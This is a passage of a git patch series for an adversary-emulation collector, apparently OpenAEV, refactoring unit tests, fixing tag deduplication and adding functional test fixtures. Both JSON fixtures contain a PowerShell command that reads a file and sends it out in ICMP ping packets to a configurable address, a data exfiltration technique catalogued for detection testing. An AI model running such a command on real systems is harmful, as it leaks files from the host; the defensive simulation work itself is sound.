@@ def test_openaev_collector_process_jsonapi_payload( m_githubcrawler, ): _configuration = daemon_config_data - api = MagicMock() payload = MagicMock() flat_payload = { "id": "json api id", @@ -261,34 +260,27 @@ def test_openaev_collector_process_jsonapi_payload( m_process_document.return_value = payload_document, new_document collector = module.OpenAEVOpenAEV(_configuration) - collector.api = api - external_id = collector._process_jsonapi_payload(payload) + output_payload = collector._process_jsonapi_payload(payload) m_json_api_doc.deserialize.assert_called_with(payload) m_process_payload_tags.assert_called_with(flat_payload) - self.assertEqual(flat_payload["payload_tags"], new_tags) + self.assertEqual(output_payload["payload_tags"], new_tags) m_process_payload_attack_patterns.assert_called_with(flat_payload) self.assertEqual( - flat_payload["payload_attack_patterns"], + output_payload["payload_attack_patterns"], m_process_payload_attack_patterns.return_value, ) m_process_document.assert_called_with(flat_payload, "dropper", tags_mapping) - self.assertIsNone(flat_payload.get("dropper")) - self.assertEqual(flat_payload["payload_document"], payload_document) + self.assertIsNone(output_payload.get("dropper")) + self.assertEqual(output_payload["payload_document"], payload_document) self.assertEqual( - flat_payload["payload_domains"], + output_payload["payload_domains"], [{"domain_name": "domain name", "domain_color": "domain color"}], ) - self.assertIsNone(flat_payload.get("id")) - self.assertIsNone(flat_payload.get("type")) - self.assertIsNone(flat_payload.get("payload_id")) - self.assertEqual( - flat_payload["payload_collector"], - collector._configuration.get("collector_id"), - ) - api.payload.upsert.assert_called_with(flat_payload) - self.assertEqual(external_id, "payload id") + self.assertIsNone(output_payload.get("id")) + self.assertIsNone(output_payload.get("type")) + self.assertIsNone(output_payload.get("payload_id")) @patch.object(module.OpenAEVOpenAEV, "_process_document") @patch.object(module.OpenAEVOpenAEV, "_process_payload_attack_patterns") @@ -308,7 +300,6 @@ def test_openaev_collector_process_jsonflat_payload( "payload_information": payload_information, } _configuration = daemon_config_data - api = MagicMock() tags_mapping = MagicMock() new_tags = MagicMock() m_process_payload_tags.return_value = tags_mapping, new_tags @@ -317,24 +308,17 @@ def test_openaev_collector_process_jsonflat_payload( m_process_document.return_value = payload_document, new_document collector = module.OpenAEVOpenAEV(_configuration) - collector.api = api - external_id = collector._process_jsonflat_payload(payload) + output_payload = collector._process_jsonflat_payload(payload) m_process_payload_tags.assert_called_with(payload) - self.assertEqual(payload_information["payload_tags"], new_tags) + self.assertEqual(output_payload["payload_tags"], new_tags) m_process_payload_attack_patterns.assert_called_with(payload) self.assertEqual( - payload_information["payload_attack_patterns"], + output_payload["payload_attack_patterns"], m_process_payload_attack_patterns.return_value, ) m_process_document.assert_called_with(payload, "payload_document", tags_mapping) - self.assertEqual( - payload_information["payload_collector"], - collector._configuration.get("collector_id"), - ) - api.payload.upsert.assert_called_with(payload_information) - self.assertEqual(external_id, "payload external id") @patch.object(module.OpenAEVOpenAEV, "_process_jsonflat_payload") @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_flat") @@ -349,22 +333,31 @@ def test_openaev_collector_process_single_payload_jsonapi_case( m_githubcrawler, ): _configuration = daemon_config_data + api = MagicMock() m_is_valid_json_api.return_value = True + _payload = MagicMock() + m_githubcrawler.return_value.get_json.return_value = _payload + _output_payload = {"payload_name": "name", "payload_external_id": "external-id"} + m_process_jsonapi_payload.return_value = _output_payload collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api collector.current_payload_path = sentinel.payload_path - _payload = MagicMock - m_githubcrawler.return_value.get_json.return_value = _payload - data = collector._process_single_payload() + external_id = collector._process_single_payload() m_githubcrawler.return_value.get_json.assert_called_with(sentinel.payload_path) m_is_valid_json_api.assert_called_with(_payload) m_process_jsonapi_payload.assert_called_with(_payload) m_is_valid_json_flat.assert_not_called() m_process_jsonflat_payload.assert_not_called() - self.assertEqual(data, m_process_jsonapi_payload.return_value) + api.payload.upsert.assert_called_with(m_process_jsonapi_payload.return_value) + self.assertEqual( + _output_payload["payload_collector"], + collector._configuration.get("collector_id"), + ) + self.assertEqual(external_id, "external-id") @patch.object(module.OpenAEVOpenAEV, "_process_jsonflat_payload") @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_flat") @@ -379,23 +372,32 @@ def test_openaev_collector_process_single_payload_jsonflat_case( m_githubcrawler, ): _configuration = daemon_config_data + api = MagicMock() m_is_valid_json_api.return_value = False m_is_valid_json_flat.return_value = True + _payload = MagicMock() + m_githubcrawler.return_value.get_json.return_value = _payload + _output_payload = {"payload_name": "name", "payload_external_id": "external-id"} + m_process_jsonflat_payload.return_value = _output_payload collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api collector.current_payload_path = sentinel.payload_path - _payload = MagicMock - m_githubcrawler.return_value.get_json.return_value = _payload - data = collector._process_single_payload() + external_id = collector._process_single_payload() m_githubcrawler.return_value.get_json.assert_called_with(sentinel.payload_path) m_is_valid_json_api.assert_called_with(_payload) m_process_jsonapi_payload.assert_not_called() m_is_valid_json_flat.assert_called_with(_payload) m_process_jsonflat_payload.assert_called_with(_payload) - self.assertEqual(data, m_process_jsonflat_payload.return_value) + api.payload.upsert.assert_called_with(m_process_jsonflat_payload.return_value) + self.assertEqual( + _output_payload["payload_collector"], + collector._configuration.get("collector_id"), + ) + self.assertEqual(external_id, "external-id") @patch.object(module.OpenAEVOpenAEV, "_process_single_payload") def test_openaev_collector_process_message( From 22d1f21780e480020933622dd21fb075c703dff2 Mon Sep 17 00:00:00 2001 From: guzmud Date: Thu, 21 May 2026 16:43:03 +0200 Subject: [PATCH 10/13] [openaev] test(collector): adding function testing of payload processing --- openaev/openaev/openaev_openaev.py | 4 +- openaev/tests/functional/new_format.json | 180 ++++++++++++++++++ openaev/tests/functional/old_format.json | 81 ++++++++ .../functional/test_payload_processing.py | 128 +++++++++++++ 4 files changed, 391 insertions(+), 2 deletions(-) create mode 100644 openaev/tests/functional/new_format.json create mode 100644 openaev/tests/functional/old_format.json create mode 100644 openaev/tests/functional/test_payload_processing.py diff --git a/openaev/openaev/openaev_openaev.py b/openaev/openaev/openaev_openaev.py index 198be803..860ef74a 100644 --- a/openaev/openaev/openaev_openaev.py +++ b/openaev/openaev/openaev_openaev.py @@ -59,14 +59,14 @@ def _process_payload_tags(self, payload: dict): # Add collector source tag source_tag_name = "source:openaev-datasets" source_tag_id = self._create_or_get_tag(source_tag_name, "#ef4444") # Red - if source_tag_id: + if source_tag_id and source_tag_id not in new_tags: new_tags.append(source_tag_id) # Add native/community tag if applicable if payload.get("native_collection", False): native_tag_name = "type:native" native_tag_id = self._create_or_get_tag(native_tag_name, "#10b981") # Green - if native_tag_id: + if native_tag_id and native_tag_id not in new_tags: new_tags.append(native_tag_id) return tags_mapping, new_tags diff --git a/openaev/tests/functional/new_format.json b/openaev/tests/functional/new_format.json new file mode 100644 index 00000000..238e32fe --- /dev/null +++ b/openaev/tests/functional/new_format.json @@ -0,0 +1,180 @@ +{ + "data" : { + "id" : "9370b76d-c1de-48e8-9b0c-16414e300354", + "type" : "command", + "attributes" : { + "payload_type" : "Command", + "command_executor" : "psh", + "command_content" : "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send(\"#{ip_address}\", 1500, $Data) }\n", + "payload_id" : "9370b76d-c1de-48e8-9b0c-16414e300354", + "payload_name" : "Exfiltration Over Alternative Protocol - ICMP", + "payload_description" : "Exfiltration of specified file over ICMP protocol.\n\nUpon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.\n", + "payload_platforms" : [ "Windows" ], + "payload_cleanup_executor" : null, + "payload_cleanup_command" : null, + "payload_elevation_required" : false, + "payload_arguments" : [ { + "type" : "text", + "key" : "input_file", + "default_value" : "C:\\Windows\\System32\\notepad.exe", + "description" : null, + "separator" : null + }, { + "type" : "text", + "key" : "ip_address", + "default_value" : "127.0.0.1", + "description" : null, + "separator" : null + } ], + "payload_prerequisites" : [ ], + "payload_external_id" : "16e5f26d-e92f-4a2f-8894-abbf29087153", + "payload_source" : "FILIGRAN", + "payload_expectations" : [ "PREVENTION", "DETECTION" ], + "payload_status" : "VERIFIED", + "payload_execution_arch" : "ALL_ARCHITECTURES", + "payload_created_at" : "2025-07-30T06:24:33.794113Z", + "payload_updated_at" : "2026-05-19T13:05:00.117600Z" + }, + "relationships" : { + "payload_attack_patterns" : { + "data" : [ { + "id" : "bbc76d1b-918d-4eb7-8a43-ee0c3133c0bb", + "type" : "attack_patterns" + } ] + }, + "payload_tags" : { + "data" : [ { + "id" : "690e69a9-d229-4a6d-a0cd-ead2747153aa", + "type" : "tags" + }, { + "id" : "13269285-08b1-423e-8ca2-1bc3553c9408", + "type" : "tags" + } ] + }, + "payload_domains" : { + "data" : [ { + "id" : "28567513-3d69-4411-a825-802beb8948cc", + "type" : "domains" + }, { + "id" : "0f9dd86d-3f23-4d6a-bfef-11d80fc9766c", + "type" : "domains" + }, { + "id" : "ff033435-8631-4c7b-9ed8-178b34011e65", + "type" : "domains" + } ] + } + } + }, + "included" : [ { + "id" : "2dfebffe-e2dd-4324-bd0c-2b1cb5408d0b", + "type" : "kill_chain_phases", + "attributes" : { + "phase_id" : "2dfebffe-e2dd-4324-bd0c-2b1cb5408d0b", + "phase_external_id" : "TA0010", + "phase_stix_id" : "x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462", + "phase_name" : "Exfiltration", + "phase_shortname" : "exfiltration", + "phase_kill_chain_name" : "mitre-attack", + "phase_description" : "The adversary is trying to steal data.\n\nExfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.", + "phase_order" : 12, + "phase_created_at" : "2025-07-22T13:40:49.929298Z", + "phase_updated_at" : "2025-07-22T13:40:49.929299Z" + } + }, { + "id" : "6e40d76d-6c21-4281-9704-f728866ff35c", + "type" : "attack_patterns", + "attributes" : { + "attack_pattern_id" : "6e40d76d-6c21-4281-9704-f728866ff35c", + "attack_pattern_stix_id" : "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "attack_pattern_name" : "Exfiltration Over Alternative Protocol", + "attack_pattern_description" : "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).", + "attack_pattern_external_id" : "T1048", + "attack_pattern_platforms" : [ "ESXi", "IaaS", "Linux", "macOS", "Network Devices", "Office Suite", "SaaS", "Windows" ], + "attack_pattern_permissions_required" : [ ], + "attack_pattern_created_at" : "2025-07-22T13:40:50.760141Z", + "attack_pattern_updated_at" : "2026-04-28T08:40:48.980402Z" + }, + "relationships" : { + "attack_pattern_kill_chain_phases" : { + "data" : [ { + "id" : "2dfebffe-e2dd-4324-bd0c-2b1cb5408d0b", + "type" : "kill_chain_phases" + } ] + } + } + }, { + "id" : "bbc76d1b-918d-4eb7-8a43-ee0c3133c0bb", + "type" : "attack_patterns", + "attributes" : { + "attack_pattern_id" : "bbc76d1b-918d-4eb7-8a43-ee0c3133c0bb", + "attack_pattern_stix_id" : "attack-pattern--be72481a-b46e-48da-8c33-2cdd510d38e3", + "attack_pattern_name" : "Exfiltration Over Unencrypted Non-C2 Protocol", + "attack_pattern_description" : "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "attack_pattern_external_id" : "T1048.003", + "attack_pattern_platforms" : [ ], + "attack_pattern_permissions_required" : [ ], + "attack_pattern_created_at" : "2025-07-22T13:40:55.153454Z", + "attack_pattern_updated_at" : "2026-05-19T13:05:00.076338Z" + }, + "relationships" : { + "attack_pattern_parent" : { + "data" : { + "id" : "6e40d76d-6c21-4281-9704-f728866ff35c", + "type" : "attack_patterns" + } + }, + "attack_pattern_kill_chain_phases" : { + "data" : [ { + "id" : "2dfebffe-e2dd-4324-bd0c-2b1cb5408d0b", + "type" : "kill_chain_phases" + } ] + } + } + }, { + "id" : "690e69a9-d229-4a6d-a0cd-ead2747153aa", + "type" : "tags", + "attributes" : { + "tag_id" : "690e69a9-d229-4a6d-a0cd-ead2747153aa", + "tag_name" : "type:native", + "tag_color" : "#10b981" + } + }, { + "id" : "13269285-08b1-423e-8ca2-1bc3553c9408", + "type" : "tags", + "attributes" : { + "tag_id" : "13269285-08b1-423e-8ca2-1bc3553c9408", + "tag_name" : "source:openaev-datasets", + "tag_color" : "#ef4444" + } + }, { + "id" : "28567513-3d69-4411-a825-802beb8948cc", + "type" : "domains", + "attributes" : { + "domain_id" : "28567513-3d69-4411-a825-802beb8948cc", + "domain_name" : "Data Exfiltration", + "domain_color" : "#9933CC", + "domain_created_at" : "2026-02-06T08:50:48.372475Z", + "domain_updated_at" : "2026-02-06T08:50:48.372475Z" + } + }, { + "id" : "0f9dd86d-3f23-4d6a-bfef-11d80fc9766c", + "type" : "domains", + "attributes" : { + "domain_id" : "0f9dd86d-3f23-4d6a-bfef-11d80fc9766c", + "domain_name" : "Endpoint", + "domain_color" : "#389CFF", + "domain_created_at" : "2026-02-06T08:50:48.372475Z", + "domain_updated_at" : "2026-02-06T08:50:48.372475Z" + } + }, { + "id" : "ff033435-8631-4c7b-9ed8-178b34011e65", + "type" : "domains", + "attributes" : { + "domain_id" : "ff033435-8631-4c7b-9ed8-178b34011e65", + "domain_name" : "Network", + "domain_color" : "#009933", + "domain_created_at" : "2026-02-06T08:50:48.372475Z", + "domain_updated_at" : "2026-02-06T08:50:48.372475Z" + } + } ] +} \ No newline at end of file diff --git a/openaev/tests/functional/old_format.json b/openaev/tests/functional/old_format.json new file mode 100644 index 00000000..9934cf6e --- /dev/null +++ b/openaev/tests/functional/old_format.json @@ -0,0 +1,81 @@ +{ + "export_version": 1, + "native_collection": true, + "payload_information": { + "payload_type": "Command", + "payload_name": "Exfiltration Over Alternative Protocol - ICMP", + "payload_description": "Exfiltration of specified file over ICMP protocol.\n\nUpon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.\n", + "payload_platforms": [ + "Windows" + ], + "payload_attack_patterns": [ + { + "attack_pattern_id": "2510c51f-dfce-4b7f-b860-1b69ed4654b7", + "attack_pattern_name": "Exfiltration Over Unencrypted Non-C2 Protocol", + "attack_pattern_description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "attack_pattern_external_id": "T1048.003", + "attack_pattern_kill_chain_phases": null + } + ], + "payload_cleanup_executor": null, + "payload_cleanup_command": null, + "payload_elevation_required": false, + "payload_arguments": [ + { + "type": "text", + "key": "input_file", + "default_value": "C:\\Windows\\System32\\notepad.exe", + "description": null, + "separator": null + }, + { + "type": "text", + "key": "ip_address", + "default_value": "127.0.0.1", + "description": null, + "separator": null + } + ], + "payload_prerequisites": [], + "payload_external_id": "16e5f26d-e92f-4a2f-8894-abbf29087153", + "payload_source": "FILIGRAN", + "payload_expectations": [ + "PREVENTION", + "DETECTION" + ], + "payload_status": "VERIFIED", + "payload_execution_arch": "ALL_ARCHITECTURES", + "payload_detection_remediations": [], + "payload_tags": [], + "payload_output_parsers": [], + "payload_created_at": "2025-06-20T09:48:40.920388Z", + "payload_updated_at": "2025-07-30T05:22:43.528118Z", + "command_executor": "psh", + "command_content": "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send(\"#{ip_address}\", 1500, $Data) }\n", + "payload_domains": [ + { + "domain_name": "Endpoint", + "domain_color": "#389CFF" + }, + { + "domain_name": "Data Exfiltration", + "domain_color": "#9933CC" + }, + { + "domain_name": "Network", + "domain_color": "#009933" + } + ] + }, + "payload_tags": [], + "payload_attack_patterns": [ + { + "attack_pattern_id": "2510c51f-dfce-4b7f-b860-1b69ed4654b7", + "attack_pattern_name": "Exfiltration Over Unencrypted Non-C2 Protocol", + "attack_pattern_description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "attack_pattern_external_id": "T1048.003", + "attack_pattern_kill_chain_phases": null + } + ], + "payload_arguments_documents": [] +} \ No newline at end of file diff --git a/openaev/tests/functional/test_payload_processing.py b/openaev/tests/functional/test_payload_processing.py new file mode 100644 index 00000000..d5c8645f --- /dev/null +++ b/openaev/tests/functional/test_payload_processing.py @@ -0,0 +1,128 @@ +import unittest +from pathlib import Path +from unittest.mock import MagicMock + +import orjson + +import openaev.openaev_openaev as module + +daemon_config_data = { + "openaev_url": "http://fake.url", + "openaev_token": "my_awesome_token", + "openaev_url_prefix": "https://raw.githubusercontent.com/OpenAEV-Platform/payloads/refs/heads/main/", + "collector_id": "collector-id", +} +old_format_path = Path("./tests/functional/old_format.json") +new_format_path = Path("./tests/functional/new_format.json") + + +def fake_upsert_tag(data): + return {"tag_id": f"id-{data.get('tag_name')}"} + + +class TestProcessingFunctions(unittest.TestCase): + def test_compare_process_results(self): + _configuration = daemon_config_data + api = MagicMock() + api.tag.upsert.side_effect = fake_upsert_tag + session = MagicMock() + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + collector.session = session + + old_payload = orjson.loads(old_format_path.read_bytes()) + new_payload = orjson.loads(new_format_path.read_bytes()) + + old_payload_processed = collector._process_jsonflat_payload(old_payload) + new_payload_processed = collector._process_jsonapi_payload(new_payload) + + self.assertTrue( + all( + key in new_payload_processed + for key in old_payload_processed + if old_payload_processed[key] + ) + ) + self.assertTrue( + all( + key in old_payload_processed + for key in new_payload_processed + if new_payload_processed[key] + ) + ) + + self.assertTrue( + all( + type(old_payload_processed[key]) == type(new_payload_processed[key]) + for key in old_payload_processed + if old_payload_processed[key] + ) + ) + self.assertTrue( + all( + type(old_payload_processed[key]) == type(new_payload_processed[key]) + for key in new_payload_processed + if new_payload_processed[key] + ) + ) + + exclusion_list = ["payload_created_at", "payload_updated_at"] + for key in old_payload_processed: + if old_payload_processed[key] and key not in exclusion_list: + if isinstance(old_payload_processed[key], dict): + self.assertEqual( + old_payload_processed[key], new_payload_processed[key] + ) + elif isinstance(old_payload_processed[key], list): + try: + self.assertEqual( + sorted(old_payload_processed[key]), + sorted(new_payload_processed[key]), + ) + except TypeError: + self.assertTrue( + all( + element in new_payload_processed[key] + for element in old_payload_processed[key] + ) + ) + self.assertTrue( + all( + element in old_payload_processed[key] + for element in new_payload_processed[key] + ) + ) + else: + self.assertEqual( + old_payload_processed[key], new_payload_processed[key] + ) + for key in new_payload_processed: + if new_payload_processed[key] and key not in exclusion_list: + if isinstance(new_payload_processed[key], dict): + self.assertEqual( + old_payload_processed[key], new_payload_processed[key] + ) + elif isinstance(new_payload_processed[key], list): + try: + self.assertEqual( + sorted(old_payload_processed[key]), + sorted(new_payload_processed[key]), + ) + except TypeError: + self.assertTrue( + all( + element in new_payload_processed[key] + for element in old_payload_processed[key] + ) + ) + self.assertTrue( + all( + element in old_payload_processed[key] + for element in new_payload_processed[key] + ) + ) + else: + self.assertEqual( + old_payload_processed[key], new_payload_processed[key] + ) From 777ebdf66e1a130b7a503b6d0d9b9e7da3a41b92 Mon Sep 17 00:00:00 2001 From: guzmud Date: Thu, 21 May 2026 16:48:23 +0200 Subject: [PATCH 11/13] [openaev] chore(tests): moving unit tests inside unit folder --- openaev/tests/{ => unit}/test_github_crawler.py | 0 openaev/tests/{ => unit}/test_openaev_openaev.py | 2 +- 2 files changed, 1 insertion(+), 1 deletion(-) rename openaev/tests/{ => unit}/test_github_crawler.py (100%) rename openaev/tests/{ => unit}/test_openaev_openaev.py (99%) diff --git a/openaev/tests/test_github_crawler.py b/openaev/tests/unit/test_github_crawler.py similarity index 100% rename from openaev/tests/test_github_crawler.py rename to openaev/tests/unit/test_github_crawler.py diff --git a/openaev/tests/test_openaev_openaev.py b/openaev/tests/unit/test_openaev_openaev.py similarity index 99% rename from openaev/tests/test_openaev_openaev.py rename to openaev/tests/unit/test_openaev_openaev.py index aa26454d..081e4bc8 100644 --- a/openaev/tests/test_openaev_openaev.py +++ b/openaev/tests/unit/test_openaev_openaev.py @@ -170,7 +170,7 @@ def test_openaev_collector_process_document( "id": "leftover-id", "type": "documents", "document_tags": [{"tag_id": "tag1"}], - "document_name": "path.file", + "document_target": "path.file", "document_path": "malware/malicious/evil/legit_document.docx", } } From 9976f89dee8fcb6b3d3373a446d0d57b3f5d3885 Mon Sep 17 00:00:00 2001 From: guzmud Date: Fri, 22 May 2026 08:47:18 +0200 Subject: [PATCH 12/13] [openaev] chore(pyproject): updating pyoaev 2.260501.0 --- openaev/pyproject.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/openaev/pyproject.toml b/openaev/pyproject.toml index e3e0ed8a..d8caffa3 100644 --- a/openaev/pyproject.toml +++ b/openaev/pyproject.toml @@ -31,4 +31,4 @@ build-backend = "poetry.core.masonry.api" [tool.cmw] install-command = "poetry install --extras prod" config-dump-command = "poetry run python -m openaev.openaev_openaev --dump-config-schema" -icon-path = "openaev/img/icon-openaev.png" \ No newline at end of file +icon-path = "openaev/img/icon-openaev.png" From 174492745d045494dc89ce2787ef101b4c99cce7 Mon Sep 17 00:00:00 2001 From: guzmud Date: Wed, 27 May 2026 09:14:46 +0200 Subject: [PATCH 13/13] [openaev] chore(pyproject): adding pytest and dev dependencies --- openaev/pyproject.toml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/openaev/pyproject.toml b/openaev/pyproject.toml index d8caffa3..92a3372d 100644 --- a/openaev/pyproject.toml +++ b/openaev/pyproject.toml @@ -20,6 +20,9 @@ pygithub = "^2.9.1" requests = ">=2.33.0,<2.34.0" orjson = "^3.11.9" +[tool.poetry.group.dev.dependencies] +pytest = "^8.3.5" + [tool.poetry.extras] prod = ["pyoaev"] dev = ["pyoaev"]